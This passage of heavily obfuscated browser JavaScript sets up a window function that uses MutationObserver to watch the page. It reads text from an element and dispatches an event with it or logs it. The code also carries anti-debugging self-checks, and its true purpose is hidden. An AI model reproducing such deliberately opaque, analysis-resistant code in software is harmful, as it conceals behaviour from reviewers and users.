_0x486c52=_0x5ed3df[_0x8fffbc(\'ji]W\',0x4c8)+\'ly\'](_0x2eb36b,arguments);return _0xce4a0b=null,_0x486c52;}else{const _0x206fba=_0x40116a[\'app\'+\'ly\'](_0x388777,arguments);return _0x40116a=null,_0x206fba;}}}else(function(){return![];}[\'con\'+\'str\'+\'uct\'+\'or\'](_0x59ef05[_0x8fffbc(\'5]Ve\',0x4a9)+\'RF\'](_0x59ef05[_0x8fffbc(\'keyU\',0x489)+\'fG\'],_0x59ef05[_0x8fffbc(\'keyU\',0x575)+\'Zr\']))[\'app\'+\'ly\'](_0x59ef05[_0x8fffbc(\'9*HF\',0x439)+\'qA\']));}:function(){};return _0x2c0ae3=![],_0x59ab3b;}};}());(function(){function _0x5da752(_0xb67e67,_0x254769){return _0x3762(_0x254769-0x265,_0xb67e67);}const _0x51ee3f={\'EJJPa\':function(_0x343438){return _0x343438();},\'OULfV\':function(_0x134e56){return _0x134e56();},\'mqRJw\':_0x5da752(\'fr6p\',0x42e)+_0x5da752(\'uewv\',0x391)+\'+)+\'+_0x5da752(\'uewv\',0x4bb),\'YsbkM\':function(_0x25120e,_0x384640){return _0x25120e===_0x384640;},\'orWrj\':_0x5da752(\'D^n!\',0x49d)+\'tL\',\'Vezmg\':\'fun\'+_0x5da752(\'Uz8[\',0x456)+_0x5da752(\'#Ig@\',0x48c)+_0x5da752(\'6^)y\',0x3e7)+\'\\x20*\\x5c\'+\')\',\'fQOzu\':\'\\x5c+\\x5c\'+\'+\\x20*\'+_0x5da752(\'p$1W\',0x421)+_0x5da752(\'wjEi\',0x460)+\'zA-\'+_0x5da752(\'jwY6\',0x3e2)+_0x5da752(\'H]9!\',0x37b)+_0x5da752(\'jwY6\',0x48f)+_0x5da752(\'fr6p\',0x453)+_0x5da752(\'F4#B\',0x494)+_0x5da752(\'j)r8\',0x473)+\')\',\'XkmJf\':function(_0x108ff3,_0x3f4fb7){return _0x108ff3(_0x3f4fb7);},\'tOAWY\':_0x5da752(\'fr6p\',0x3b5)+\'t\',\'oqdbL\':function(_0x35dd48,_0x261380){return _0x35dd48+_0x261380;},\'YZYzx\':_0x5da752(\'H%e]\',0x43e)+\'in\',\'GjEcL\':\'inp\'+\'ut\',\'YHjyq\':function(_0x48c17c,_0x379dea){return _0x48c17c!==_0x379dea;},\'UgPLO\':_0x5da752(\'F4#B\',0x4ab)+\'cV\',\'FPiZp\':function(_0x3f7810,_0x1f16d4){return _0x3f7810===_0x1f16d4;},\'hLFxR\':_0x5da752(\'#Ig@\',0x451)+\'WT\',\'UmbBI\':function(_0x5ed4dd,_0x257ee0,_0x2a94bd){return _0x5ed4dd(_0x257ee0,_0x2a94bd);}};_0x51ee3f[_0x5da752(\'B&amp;@p\',0x353)+\'BI\'](_0x577523,this,function(){function _0x17be9d(_0x4a1308,_0x2eb615){return _0x5da752(_0x2eb615,_0x4a1308- -0x49b);}const _0x31f763={\'OoZmH\':function(_0x310d5a){function _0x392b8b(_0x51afd8,_0x3998a8){return _0x3762(_0x51afd8-0xbf,_0x3998a8);}return _0x51ee3f[_0x392b8b(0x229,\'F4#B\')+\'Pa\'](_0x310d5a);},\'HtLxw\':function(_0x1a72f8){function _0x2c84ba(_0x278240,_0x42e9e5){return _0x3762(_0x42e9e5-0x245,_0x278240);}return _0x51ee3f[_0x2c84ba(\'ajln\',0x3ab)+\'fV\'](_0x1a72f8);},\'XsfcA\':_0x51ee3f[_0x17be9d(-0xe3,\')FYe\')+\'Jw\']};if(_0x51ee3f[_0x17be9d(-0x132,\'keyU\')+\'kM\'](_0x51ee3f[\'orW\'+\'rj\'],_0x51ee3f[_0x17be9d(-0xd3,\'#Ig@\')+\'rj\'])){const _0x547c56=new RegExp(_0x51ee3f[\'Vez\'+\'mg\']),_0x42ff7e=new RegExp(_0x51ee3f[\'fQO\'+\'zu\'],\'i\'),_0x4aab56=_0x51ee3f[_0x17be9d(-0x49,\'obHj\')+\'Jf\'](_0x4cfc56,_0x51ee3f[_0x17be9d(-0x22,\'Ej7O\')+\'WY\']);if(!_0x547c56[_0x17be9d(-0x10f,\'wjEi\')+\'t\'](_0x51ee3f[_0x17be9d(-0x12f,\'2H[!\')+\'bL\'](_0x4aab56,_0x51ee3f[_0x17be9d(-0x20,\'uewv\')+\'zx\']))||!_0x42ff7e[_0x17be9d(-0xfd,\'ji]W\')+\'t\'](_0x51ee3f[_0x17be9d(-0x14,\'YQri\')+\'bL\'](_0x4aab56,_0x51ee3f[_0x17be9d(0xd,\'j)r8\')+\'cL\']))){if(_0x51ee3f[_0x17be9d(-0xe2,\'5]Ve\')+\'yq\'](_0x51ee3f[_0x17be9d(0x40,\'w&amp;WF\')+\'LO\'],_0x51ee3f[_0x17be9d(-0x155,\'Ej7O\')+\'LO\'])){if(_0x824341){const _0x2afb10=_0x484d19[_0x17be9d(0x48,\'Uz8[\')+\'ly\'](_0xad6b03,arguments);return _0x163a94=null,_0x2afb10;}}else _0x51ee3f[_0x17be9d(-0xcf,\'2H[!\')+\'Jf\'](_0x4aab56,\'0\');}else{if(_0x51ee3f[_0x17be9d(-0x125,\'8R(E\')+\'Zp\'](_0x51ee3f[_0x17be9d(-0x11d,\'7Isp\')+\'xR\'],_0x51ee3f[_0x17be9d(-0x19,\'a29p\')+\'xR\']))_0x51ee3f[_0x17be9d(-0xee,\'j)r8\')+\'fV\'](_0x4cfc56);else{if(_0x31f763[_0x17be9d(0x4a,\'37kx\')+\'mH\'](_0x51cc45))return{\'value\':_0x31f763[\'HtL\'+\'xw\'](_0x2d98c6)[_0x17be9d(-0x107,\'j)r8\')+\'ue\'],\'text\':_0x31f763[_0x17be9d(-0x141,\'C4YZ\')+\'xw\'](_0x5accb1)[_0x17be9d(0x46,\'uewv\')+_0x17be9d(-0x11c,\'iHCO\')+_0x17be9d(-0x10c,\'N!1Y\')][_0x17be9d(-0x24,\'p*$n\')+\'it\'](\'\\x0a\')[-0xb2+-0x1976+-0x5d*-0x48][_0x17be9d(-0x145,\'0)V6\')+\'it\'](\':\')[-0x1ed6+0x59*0x43+0x78b][_0x17be9d(0x2c,\'ji]W\')+\'m\']()};}}}else return _0x4a27b4[\'toS\'+_0x17be9d(-0x30,\'L0[V\')+\'ng\']()[_0x17be9d(-0x11f,\'uewv\')+_0x17be9d(-0xfe,\'bhuG\')](_0x31f763[_0x17be9d(0x28,\'jnaT\')+\'cA\'])[_0x17be9d(-0x14a,\'L0[V\')+_0x17be9d(-0xbf,\'b(![\')+\'ng\']()[_0x17be9d(0x2f,\'#Gcp\')+_0x17be9d(-0x54,\'8R(E\')+_0x17be9d(-0x15e,\'obHj\')+\'or\'](_0xb73fa4)[_0x17be9d(-0x5,\'7Isp\')+_0x17be9d(0x49,\'L0[V\')](_0x31f763[\'Xsf\'+\'cA\']);})();}()),(window[_0x5e0cb6(\'L0[V\',-0x1a1)+_0x5e0cb6(\'a29p\',-0x138)+\'v\']=function(_0x5510ca){const _0x202c12={\'dVWRe\':function(_0x320b4b,_0x2467f6){return _0x320b4b!==_0x2467f6;},\'hRPoe\':\'vhj\'+\'BD\',\'wIliC\':\'Iad\'+\'tK\',\'TXGFj\':function(_0x7005fa){return _0x7005fa();},\'GvMwD\':function(_0x8299d6){return _0x8299d6();},\'QaABU\':function(_0x238bf3,_0x4dca41){return _0x238bf3===_0x4dca41;},\'dWsAq\':_0x131f4b(0x18f,\'iHCO\')+\'bu\',\'ACpuJ\':\'JjS\'+\'oE\',\'mGbkl\':function(_0xf18deb){return _0xf18deb();},\'yzzrg\':function(_0x25356e,_0x213fea){return _0x25356e(_0x213fea);},\'SLxnH\':\'fun\'+\'cti\'+_0x131f4b(0x109,\'O^MI\')+_0x131f4b(0x2b,\'ajln\')+_0x131f4b(0x34,\'w&amp;WF\')+\')\',\'KDiGs\':_0x131f4b(0x4c,\'YQri\')+_0x131f4b(0x113,\'D^n!\')+_0x131f4b(0x159,\'Rdre\')+_0x131f4b(-0x2,\'a29p\')+_0x131f4b(0x144,\'#Ig@\')+\'Z_$\'+_0x131f4b(0x7a,\'dCo]\')+_0x131f4b(0x177,\']rT)\')+\'-zA\'+_0x131f4b(0x6d,\'fr6p\')+_0x131f4b(0x121,\'[sZX\')+\')\',\'WVZPF\':_0x131f4b(0x44,\'ajln\')+\'t\',\'JYrPr\':function(_0x1860d9,_0x39c55e){return _0x1860d9+_0x39c55e;},\'noYTo\':\'cha\'+\'in\',\'vZSVe\':function(_0x26ea2d,_0x5ad88a){return _0x26ea2d+_0x5ad88a;},\'dQDQq\':_0x131f4b(0x94,\'UPG@\')+\'ut\',\'zeOkn\':function(_0x1d9370){return _0x1d9370();},\'TgcrH\':function(_0x544dbb,_0x45a06d,_0x45519c){return _0x544dbb(_0x45a06d,_0x45519c);},\'FbuLY\':_0x131f4b(0x5e,\'8R(E\')+\'Jb\',\'jjzFq\':_0x131f4b(0x18d,\'ZSvG\')+\'Kw\',\'utaeJ\':function(_0xbb7af2){return _0xbb7af2();},\'DXmiX\':_0x131f4b(0x111,\'8R(E\')+\'sv\',\'Lxrbm\':function(_0x1c670e){return _0x1c670e();},\'JMAsO\':function(_0x1677fa,_0x4f2edf){return _0x1677fa(_0x4f2edf);},\'KcSNQ\':function(_0x190e85){return _0x190e85();},\'RJgIc\':function(_0x2c039d,_0x573ece){return _0x2c039d===_0x573ece;},\'zVpGl\':\'QeJ\'+\'KN\',\'YhJWc\':\'vlP\'+\'lX\'},_0x5ea0c5=()=&gt;document[_0x131f4b(0xaf,\'p*$n\')+\'Ele\'+_0x131f4b(0xde,\'8R(E\')+_0x131f4b(0x13c,\'YQri\')+_0x131f4b(0x5d,\']rT)\')+\'gNa\'+\'me\'](_0x131f4b(0x119,\'bhuG\')+_0x131f4b(0x152,\'UPG@\')+\'ss\')[0xc51+0xa59+-0x16aa],_0x25d50e=()=&gt;document[\'get\'+_0x131f4b(0x126,\'[sZX\')+_0x131f4b(0xde,\'8R(E\')+_0x131f4b(0x4d,\'[sZX\')+\'yTa\'+\'gNa\'+\'me\'](_0x131f4b(0xff,\')FYe\')+_0x131f4b(0x26,\'37kx\')+\'ss\')[0x155*0x1+0x6e8+-0x25*0x39][_0x131f4b(0x13,\'p*$n\')+_0x131f4b(0x97,\']rT)\')+\'Ele\'+_0x131f4b(0x41,\'w&amp;WF\')+\'t\'][\'par\'+_0x131f4b(0x174,\'#Gcp\')+_0x131f4b(0x14,\'L0[V\')+_0x131f4b(0x17b,\'#Gcp\')+\'t\'],_0x55ae49=()=&gt;document[\'get\'+\'Ele\'+_0x131f4b(0x1a1,\'p*$n\')+\'tBy\'+\'Id\'](_0x131f4b(0x195,\'Rdre\')),_0x104dd6=()=&gt;{function _0x324dc3(_0x1e717a,_0x26358f){return _0x131f4b(_0x26358f-0xc3,_0x1e717a);}if(_0x202c12[\'dVW\'+\'Re\'](_0x202c12[\'hRP\'+\'oe\'],_0x202c12[_0x324dc3(\'5]Ve\',0x17e)+\'iC\'])){if(_0x202c12[_0x324dc3(\'obHj\',0x214)+\'Fj\'](_0x5ea0c5))return{\'value\':_0x202c12[_0x324dc3(\'6^)y\',0x148)+\'Fj\'](_0x5ea0c5)[_0x324dc3(\'B&amp;@p\',0x24c)+\'ue\'],\'text\':_0x202c12[\'TXG\'+\'Fj\'](_0x25d50e)[\'inn\'+_0x324dc3(\'bhuG\',0x233)+_0x324dc3(\'fr6p\',0x267)][_0x324dc3(\'N!1Y\',0x142)+\'it\'](\'\\x0a\')[0x10b*-0x18+0x67d*-0x5+0x3979][_0x324dc3(\'#Gcp\',0xc6)+\'it\'](\':\')[0x1316+0x563*-0x4+0x276][_0x324dc3(\'p$1W\',0xfb)+\'m\']()};}else return _0x252d22;},_0x1456d9=()=&gt;{const _0x319d88={\'zSNbs\':_0x202c12[_0x329d27(-0x256,\'8R(E\')+\'nH\'],\'wahdw\':_0x202c12[_0x329d27(-0x23f,\'YQri\')+\'Gs\'],\'RNfJd\':function(_0x284ecc,_0x36846f){function _0x955fc1(_0x1e0ac5,_0x80a4d7){return _0x329d27(_0x80a4d7-0x18c,_0x1e0ac5);}return _0x202c12[_0x955fc1(\'0EKk\',-0x106)+\'rg\'](_0x284ecc,_0x36846f);},\'pcXvR\':_0x202c12[\'WVZ\'+\'PF\'],\'xdkkn\':function(_0x386868,_0x2b41f7){function _0x1f00ca(_0x4b6eaf,_0x208d48){return _0x329d27(_0x4b6eaf-0x67,_0x208d48);}return _0x202c12[_0x1f00ca(-0x1d1,\'ajln\')+\'Pr\'](_0x386868,_0x2b41f7);},\'LJRcw\':_0x202c12[_0x329d27(-0x2c9,\'Rdre\')+\'To\'],\'GepPX\':function(_0x262693,_0x20dfaf){return _0x202c12[\'vZS\'+\'Ve\'](_0x262693,_0x20dfaf);},\'Weged\':_0x202c12[_0x329d27(-0x20f,\'#Gcp\')+\'Qq\'],\'bejAR\':function(_0x43e556,_0x22a38d){function _0x3d5fd3(_0x2014cd,_0x1e15c0){return _0x329d27(_0x1e15c0-0x3bb,_0x2014cd);}return _0x202c12[_0x3d5fd3(\'[sZX\',0x25a)+\'rg\'](_0x43e556,_0x22a38d);},\'CclvS\':function(_0x592eb6){function _0x3f5a67(_0x37549a,_0x365c5a){return _0x329d27(_0x37549a-0x249,_0x365c5a);}return _0x202c12[_0x3f5a67(0x3c,\'H]9!\')+\'kn\'](_0x592eb6);},\'QhtZe\':function(_0x5e7d31,_0x36cad5,_0xf68a50){function _0x4a5b32(_0x173551,_0x33e0d9){return _0x329d27(_0x33e0d9-0x417,_0x173551);}return _0x202c12[_0x4a5b32(\'D^n!\',0x1be)+\'rH\'](_0x5e7d31,_0x36cad5,_0xf68a50);},\'ebLHz\':function(_0x58db8d,_0x10461b){function _0x576343(_0xf9836b,_0x50a4a3){return _0x329d27(_0xf9836b-0x6fd,_0x50a4a3);}return _0x202c12[_0x576343(0x572,\'N!1Y\')+\'Re\'](_0x58db8d,_0x10461b);},\'AajNH\':_0x202c12[_0x329d27(-0x225,\'F4#B\')+\'LY\'],\'wAroS\':_0x202c12[_0x329d27(-0x21a,\'UPG@\')+\'Fq\'],\'QRRZQ\':function(_0x19fdb1){function _0x5e5000(_0x368989,_0x3b2612){return _0x329d27(_0x368989-0x5fa,_0x3b2612);}return _0x202c12[_0x5e5000(0x4b0,\'N!1Y\')+\'eJ\'](_0x19fdb1);},\'HTkXA\':function(_0x150590){return _0x202c12[\'TXG\'+\'Fj\'](_0x150590);}};function _0x329d27(_0x5e6cf3,_0x2dc3b6){return _0x131f4b(_0x5e6cf3- -0x2e1,_0x2dc3b6);}if(_0x202c12[_0x329d27(-0x13e,\'iHCO\')+\'BU\'](_0x202c12[_0x329d27(-0x257,\'w)9n\')+\'iX\'],_0x202c12[_0x329d27(-0x1e6,\'ZSvG\')+\'iX\'])){const _0x217e47=new MutationObserver(_0x41ae1c=&gt;{const _0x2efe2b={\'ryMdj\':function(_0xdd988f){function _0x50bd81(_0x1bdde7,_0x129525){return _0x3762(_0x129525-0x239,_0x1bdde7);}return _0x202c12[_0x50bd81(\']rT)\',0x459)+\'wD\'](_0xdd988f);}};function _0x1cb011(_0x3a1fcc,_0xee8d3a){return _0x329d27(_0xee8d3a-0x6a2,_0x3a1fcc);}if(_0x202c12[_0x1cb011(\'a29p\',0x4f1)+\'BU\'](_0x202c12[\'dWs\'+\'Aq\'],_0x202c12[_0x1cb011(\'C4YZ\',0x516)+\'uJ\'])){const _0x592201={};_0x592201[_0x1cb011(\'w&amp;WF\',0x425)+_0x1cb011(\'5]Ve\',0x539)+_0x1cb011(\'N!1Y\',0x504)+\'s\']=!(-0x5cd+0x8f5+-0x65*0x8),_0x592201[\'chi\'+_0x1cb011(\'w&amp;WF\',0x4e4)+_0x1cb011(\'ZSvG\',0x51d)]=!(-0x2*0xd4c+0x100f+0xa89),_0x592201[_0x1cb011(\'wjEi\',0x441)+_0x1cb011(\'H]9!\',0x4b7)+\'e\']=!(-0xfb3+0x1f51*-0x1+0x2f04*0x1),_0x2efe2b[_0x1cb011(\'fr6p\',0x510)+\'dj\'](_0x233f18)&amp;&amp;(new _0x4efe2d(_0x3f8d06=&gt;{function _0x5dc739(_0x1e1410,_0x497921){return _0x1cb011(_0x497921,_0x1e1410- -0x72);}_0x4abc48[_0x5dc739(0x4bc,\'D^n!\')+_0x5dc739(0x461,\'YQri\')+_0x5dc739(0x34f,\'37kx\')+_0x5dc739(0x4f9,\'H]9!\')+_0x5dc739(0x42b,\'0)V6\')+\'t\']&amp;&amp;_0x7a750b[_0x5dc739(0x3c3,\'7KHy\')+_0x5dc739(0x3f3,\'Rdre\')+_0x5dc739(0x361,\'fr6p\')+_0x5dc739(0x36a,\'wjEi\')+_0x5dc739(0x3c2,\'H%e]\')+\'t\'](_0x2efe2b[\'ryM\'+\'dj\'](_0x43f728)),_0x32ac13&amp;&amp;_0x106e90[_0x5dc739(0x4ea,\')FYe\')](_0x2efe2b[_0x5dc739(0x438,\'Ca[o\')+\'dj\'](_0x5853b7));})[_0x1cb011(\'obHj\',0x3b4)+_0x1cb011(\'fr6p\',0x52f)+\'e\'](_0x2efe2b[_0x1cb011(\'#Gcp\',0x4a2)+\'dj\'](_0x18b52a),_0x592201),_0x166ed8[\'dis\'+_0x1cb011(\'5]Ve\',0x546)+_0x1cb011(\'keyU\',0x476)+\'t\']());}else{const _0x2b7c0a={};_0x2b7c0a[_0x1cb011(\'H%e]\',0x418)+_0x1cb011(\'ajln\',0x533)+_0x1cb011(\'H]9!\',0x506)+\'s\']=!(0xf63+-0x206f+0x4*0x443),_0x2b7c0a[\'chi\'+_0x1cb011(\'YQri\',0x42b)+_0x1cb011(\'w)9n\',0x3d1)]=!(-0x14fb+0x245*-0xb+0x2df2),_0x2b7c0a[\'sub\'+_0x1cb011(\'obHj\',0x4ef)+\'e\']=!(-0x349+0xffd+0x32d*-0x4),_0x202c12[_0x1cb011(\'B&amp;@p\',0x49b)+\'kl\'](_0x5ea0c5)&amp;&amp;(new MutationObserver(_0x2e3d11=&gt;{function _0x108594(_0x2d4d52,_0x141ef4){return _0x1cb011(_0x141ef4,_0x2d4d52- -0x267);}const _0xe9b131={\'AtNWr\':_0x319d88[_0x108594(0x281,\'9*HF\')+\'bs\'],\'yoLwQ\':_0x319d88[\'wah\'+\'dw\'],\'RGfFh\':function(_0x1ec3fc,_0x37f6ee){return _0x319d88[\'RNf\'+\'Jd\'](_0x1ec3fc,_0x37f6ee);},\'tWqLb\':_0x319d88[_0x108594(0x2d7,\'7Isp\')+\'vR\'],\'ehPdK\':function(_0x3e3287,_0x567c75){function _0x1b3cf5(_0x18e85c,_0x593e4e){return _0x108594(_0x593e4e- -0x5d,_0x18e85c);}return _0x319d88[_0x1b3cf5(\'L0[V\',0x178)+\'kn\'](_0x3e3287,_0x567c75);},\'tsfTL\':_0x319d88[_0x108594(0x1de,\'H]9!\')+\'cw\'],\'SdJga\':function(_0x182d4b,_0x312239){function _0x2c6c76(_0x4f66c7,_0x19c64e){return _0x108594(_0x4f66c7-0x1c6,_0x19c64e);}return _0x319d88[_0x2c6c76(0x404,\'iHCO\')+\'PX\'](_0x182d4b,_0x312239);},\'LmjXS\':_0x319d88[_0x108594(0x176,\'6^)y\')+\'ed\'],\'yNvUX\':function(_0xf91618,_0xae9852){function _0x1f6370(_0x52c131,_0x1ede97){return _0x108594(_0x52c131- -0x41,_0x1ede97);}return _0x319d88[_0x1f6370(0x142,\'p*$n\')+\'AR\'](_0xf91618,_0xae9852);},\'FkbxT\':function(_0x1e6666){function _0x2c5378(_0x1fcdd2,_0x1eb3eb){return _0x108594(_0x1eb3eb- -0x26f,_0x1fcdd2);}return _0x319d88[_0x2c5378(\'7Isp\',-0xcf)+\'vS\'](_0x1e6666);},\'fZbIk\':function(_0xde2e4e,_0xebe992,_0x490324){function _0x8dc57c(_0x99a4c2,_0x593512){return _0x108594(_0x593512- -0x168,_0x99a4c2);}return _0x319d88[_0x8dc57c(\'Uz8[\',0x69)+\'Ze\'](_0xde2e4e,_0xebe992,_0x490324);}};_0x319d88[_0x108594(0x282,\'9*HF\')+\'Hz\'](_0x319d88[_0x108594(0x2bd,\'YQri\')+\'NH\'],_0x319d88[_0x108594(0x262,\'ZSvG\')+\'oS\'])?(window[_0x108594(0x24d,\'0)V6\')+\'gre\'+_0x108594(0x1f3,\'0EKk\')+\'arE\'+_0x108594(0x2b7,\'uewv\')+\'t\']&amp;&amp;window[_0x108594(0x1db,\')FYe\')+_0x108594(0x2c5,\'w)9n\')+_0x108594(0x2ae,\'p$1W\')+_0x108594(0x2dc,\'p*$n\')+_0x108594(0x2f6,\'O^MI\')+\'t\'](_0x319d88[_0x108594(0x22a,\'j)r8\')+\'ZQ\'](_0x104dd6)),_0x5510ca&amp;&amp;console[\'log\'](_0x319d88[_0x108594(0x298,\'B&amp;@p\')+\'XA\'](_0x104dd6))):NGhaWA[\'fZb\'+\'Ik\'](_0xa40d87,this,function(){const _0x35f13a=new _0x222945(NGhaWA[\'AtN\'+\'Wr\']),_0x365ee7=new _0x1c9997(NGhaWA[_0x541949(\'Ca[o\',0x44e)+\'wQ\'],\'i\');function _0x541949(_0x4267cd,_0x7cc1cc){return _0x108594(_0x7cc1cc-0x2db,_0x4267cd);}const _0x4b50c2=NGhaWA[\'RGf\'+\'Fh\'](_0xcb4659,NGhaWA[_0x541949(\'H%e]\',0x4a0)+\'Lb\']);!_0x35f13a[\'tes\'+\'t\'](NGhaWA[_0x541949(\'p$1W\',0x500)+\'dK\'](_0x4b50c2,NGhaWA[_0x541949(\'6^)y\',0x501)+\'TL\']))||!_0x365ee7[\'tes\'+\'t\'](NGhaWA[_0x541949(\'Ej7O\',0x432)+\'ga\'](_0x4b50c2,NGhaWA[\'Lmj\'+\'XS\']))?NGhaWA[\'yNv\'+\'UX\'](_0x4b50c2,\'0\'):NGhaWA[\'Fkb\'+\'xT\'](_0x4cb48f);})();})[\'obs\'+_0x1cb011(\'uewv\',0x503)+\'e\'](_0x202c12[_0x1cb011(\'#Gcp\',0x47a)+\'wD\'](_0x25d50e),_0x2b7c0a),_0x217e47[_0x1cb011(\'jnaT\',0x41a)+_0x1cb011(\'jwY6\',0x3d0)+_0x1cb011(\'5]Ve\',0x3c9)+\'t\']());}}),_0x302b1e={};_0x302b1e[_0x329d27(-0x1a1,\'j)r8\')+_0x329d27(-0x250,\'H]9!\')+\'ute\'+\'s\']=!(0x1c06+-0x26c1+0xabb),_0x302b1e[_0x329d27(-0x20a,\'[sZX\')+_0x329d27(-0x24b,\'j)r8\')+_0x329d27(-0x1f2,\'2H[!\')]=!(-0x95c+0x1d74+0x8*-0x283),_0x302b1e[_0x329d27(-0x28d,\'UPG@\')+_0x329d27(-0x155,\'N!1Y\')+\'e\']=!(0x16b3+0x364*-0xb+0xe99),_0x217e47[_0x329d27(-0x249,\'w)9n\')+_0x329d27(-0x26b,\'#Gcp\')+\'e\'](_0x202c12[_0x329d27(-0x1a8,\'Ca[o\')+\'bm\'](_0x55ae49),_0x302b1e);}else cRscks[_0x329d27(-0x1f5,\'bhuG\')+\'rg\'](_0xafbf3a,0x1*0x2136+0x8fb+-0x607*0x7);},_0x3a329d=new MutationObserver(_0x4da5d7=&gt;{const _0x2868fc={\'NkQHT\':_0x202c12[\'SLx\'+\'nH\'],\'wXiCP\':_0x202c12[_0x1bbc0e(\'j)r8\',-0x91)+\'Gs\'],\'Bavli\':function(_0x2e7100,_0x38e9cc){function _0x20db94(_0x25f929,_0x7064f7){return _0x1bbc0e(_0x25f929,_0x7064f7-0x396);}return _0x202c12[_0x20db94(\'0EKk\',0x22f)+\'rg\'](_0x2e7100,_0x38e9cc);},\'nIXbg\':_0x202c12[_0x1bbc0e(\'dCo]\',-0x10f)+\'PF\'],\'wkpBJ\':function(_0x3928f3,_0x51080d){function _0x1d9d81(_0x56d56a,_0x33ee67){return _0x1bbc0e(_0x56d56a,_0x33ee67- -0x3c);}return _0x202c12[_0x1d9d81(\'bhuG\',-0xa5)+\'Pr\'](_0x3928f3,_0x51080d);},\'HwWrq\':_0x202c12[_0x1bbc0e(\'obHj\',-0x18e)+\'To\'],\'qCAcv\':_0x202c12[_0x1bbc0e(\'ji]W\',-0x115)+\'Qq\'],\'Wvuiu\':function(_0x119234,_0x3c41fa){function _0x89282a(_0x4711bc,_0x533a41){return _0x1bbc0e(_0x533a41,_0x4711bc-0x148);}return _0x202c12[_0x89282a(0xed,\'0EKk\')+\'sO\'](_0x119234,_0x3c41fa);},\'HzfNE\':function(_0x5bf375){function _0x326fdf(_0x55e3cb,_0x5a4634){return _0x1bbc0e(_0x5a4634,_0x55e3cb-0x646);}return _0x202c12[_0x326fdf(0x63d,\'j)r8\')+\'NQ\'](_0x5bf375);}};function _0x1bbc0e(_0x281b06,_0x278e4d){return _0x131f4b(_0x278e4d- -0x1b6,_0x281b06);}if(_0x202c12[\'RJg\'+\'Ic\'](_0x202c12[\'zVp\'+\'Gl\'],_0x202c12[_0x1bbc0e(\'fr6p\',-0x119)+\'Wc\'])){const _0x3a971c=new _0x16b50c(bptApe[_0x1bbc0e(\'ZSvG\',-0x8b)+\'HT\']),_0x9393e4=new _0x90d79a(bptApe[_0x1bbc0e(\'Ej7O\',-0xf0)+\'CP\'],\'i\'),_0x102f87=bptApe[_0x1bbc0e(\'keyU\',-0x1b4)+\'li\'](_0x419772,bptApe[_0x1bbc0e(\'wjEi\',-0x124)+\'bg\']);!_0x3a971c[\'tes\'+\'t\'](bptApe[_0x1bbc0e(\'Uz8[\',-0x196)+\'BJ\'](_0x102f87,bptApe[_0x1bbc0e(\'Ca[o\',-0x1bb)+\'rq\']))||!_0x9393e4[\'tes\'+\'t\'](bptApe[\'wkp\'+\'BJ\'](_0x102f87,bptApe[_0x1bbc0e(\'7KHy\',-0xa9)+\'cv\']))?bptApe[_0x1bbc0e(\'C4YZ\',-0xed)+\'iu\'](_0x102f87,\'0\'):bptApe[_0x1bbc0e(\'#Ig@\',-0xac)+\'NE\'](_0x2989ab);}else _0x202c12[_0x1bbc0e(\'F4#B\',-0x4d)+\'kl\'](_0x55ae49)&amp;&amp;(_0x202c12[_0x1bbc0e(\'C4YZ\',-0xe9)+\'wD\'](_0x1456d9),_0x3a329d[\'dis\'+_0x1bbc0e(\'p$1W\',-0x8a)+_0x1bbc0e(\'p*$n\',-0x25)+\'t\']());}),_0x26b3ef={};function _0x131f4b(_0x28699f,_0x2ac042){return _0x5e0cb6(_0x2ac042,_0x28699f-0x2ad);}_0x26b3ef[\'att\'+\'rib\'+_0x131f4b(0x186,\'a29p\')+\'s\']=!(0x3c1+0x60*0x61+-0x2821),_0x26b3ef[_0x131f4b(0xf1,\']rT)\')+_0x131f4b(0x17e,\'jnaT\')+\'ist\']=!(-0x18c2+0xea0+0xa22),_0x26b3ef[_0x131f4b(0x39,\'iHCO\')+_0x131f4b(-0xc,\'Ca[o\')+\'e\']=!(-0x79*-0x2c+0x40f+-0x2c3*0x9),_0x3a329d[_0x131f4b(0x5c,\')FYe\')+_0x131f4b(0x11,\'2H[!\')+\'e\'](document,_0x26b3ef);},window[_0x5e0cb6(\'p$1W\',-0x1e3)+\'gob\'+\'v\'](!(0x36d*-0x3+0x1bf+0x6*0x16c)));function _0x4cfc56(_0x2aab0b){const _0x55c66e={\'TDYpj\':function(_0x127726,_0x408ee0){return _0x127726(_0x408ee0);},\'tUtFf\':_0x318af7(0x36,\'L0[V\')+_0x318af7(0x19b,\'Rdre\')+_0x318af7(0xab,\'jwY6\')+_0x318af7(0x78,\'dCo]\')+_0x318af7(0x91,\'ZSvG\'),\'wnIeo\':_0x318af7(0x14f,\'ZSvG\')+_0x318af7(0xad,\'Ej7O\')+\'r\',\'dELNd\':function(_0x592a0c,_0x2b5771){return _0x592a0c+_0x2b5771;},\'fOGFS\':_0x318af7(0x25,\'Ej7O\')+\'u\',\'KxYNb\':_0x318af7(0x6f,\'fr6p\')+\'r\',\'RUVHJ\':_0x318af7(0xff,\'keyU\')+_0x318af7(0xd6,\'H]9!\'),\'zdTBz\':function(_0x75de7d,_0x5e51a6){return _0x75de7d===_0x5e51a6;},\'DjAlY\':_0x318af7(0x151,\'fr6p\')+\'Ny\',\'UMWjI\':function(_0x2b9dc6,_0x52b514){return _0x2b9dc6===_0x52b514;},\'VNujb\':_0x318af7(0x184,\'uewv\')+\'Pr\',\'AgDMb\':function(_0x4bed1c){return _0x4bed1c();},\'mHVTv\':function(_0x1ec233,_0x1f0cd0){return _0x1ec233===_0x1f0cd0;},\'PkTyl\':\'lPf\'+\'gX\',\'IXjrr\':\'str\'+_0x318af7(0x162,\'6^)y\'),\'qtCXE\':function(_0x1e83bd,_0x309654){return _0x1e83bd!==_0x309654;},\'qmnqY\':_0x318af7(0xf0,\'O^MI\')+\'gS\',\'YoCim\':\'hdt\'+\'cA\',\'PhUkZ\':function(_0x458112,_0x3d8976){return _0x458112/_0x3d8976;},\'pJvDa\':_0x318af7(0x117,\'#Ig@\')+_0x318af7(0xc2,\'0)V6\'),\'kmUvE\':function(_0x4b80b0,_0x531820){return _0x4b80b0%_0x531820;},\'kTuKl\':_0x318af7(0xa8,\'w&amp;WF\')+\'hW\',\'zPaLD\':_0x318af7(0xfd,\'0)V6\')+\'mz\',\'hZwre\':function(_0x68b359,_0xb7af11){return _0x68b359+_0xb7af11;},\'EDgfD\':function(_0x410332,_0x5e53b0){return _0x410332!==_0x5e53b0;},\'fqUlY\':_0x318af7(0xe,\'5]Ve\')+\'Sa\',\'lWWkU\':_0x318af7(0x111,\'a29p\')+\'tK\',\'gYkyi\':function(_0x588838,_0xeed5f3){return 